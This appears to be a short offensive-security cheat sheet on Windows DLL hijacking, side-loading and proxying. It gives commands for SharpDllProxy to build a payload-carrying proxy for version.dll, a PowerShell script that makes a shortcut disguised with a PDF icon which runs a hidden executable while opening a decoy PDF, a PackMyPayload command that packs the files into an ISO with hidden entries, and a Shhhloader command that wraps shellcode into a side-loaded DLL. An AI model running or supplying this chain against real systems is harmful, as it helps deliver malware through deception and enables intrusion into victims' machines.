DLL Hijacking

DLL Hijacking / DLL Side-Loading / DLL Proxying

Print debug output from a DLL:

#ifdef _DEBUG
#include <stdio.h>
#include <string.h>
#define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
#define DPRINT(...) { \
  fprintf(stderr, "DEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \
  fprintf(stderr, __VA_ARGS__); \
}
#else
#define DPRINT(...)
#endif

DLL Side-Loading with ISO Packing

Generate a proxy DLL with SharpDLLProxy:

Cmd > SharpDllProxy.exe --dll C:\Windows\System32\version.dll --payload OneDrive.Update
Cmd > move output_version\tmp1F94.dll C:\out\vresion.dll

Create a malicious link (also here):

$obj = New-object -ComObject wscript.shell
$link = $obj.createshortcut("C:\Tools\PackMyPayload\out\clickme.lnk")
$link.windowstyle = "7"
$link.targetpath = "%windir%/system32/cmd.exe"
$link.iconlocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13" # PDF ico
$link.arguments = "/c start update.exe & ""%ProgramFiles(x86)%/Microsoft/Edge/Application/msedge.exe"" %cd%/fake.pdf"
$link.save()

Pack all the files into an ISO with PackMyPayload:

PS > python .\PackMyPayload.py .\out\ .\out\a.iso --out-format iso --hide OneDriveStandaloneUpdater.exe,vresion.dll,version.dll,fake.pdf

Unlock DllMain

CVE-2025-24076, CVE-2025-24994

https://blog.compass-security.com/2025/04/3-milliseconds-to-admin-mastering-dll-hijacking-and-hooking-to-win-the-race-cve-2025-24076-and-cve-2025-24994/

Tools

https://github.com/monoxgas/Koppeling

DLL Proxying

Shhhloader

https://github.com/icyguider/Shhhloader

$ ./Shhhloader.py -p RuntimeBroker.exe -d -dp vresion.dll -o version.dll -s domain -sa megacorp.local shellcode.bin

Last updated 1 month ago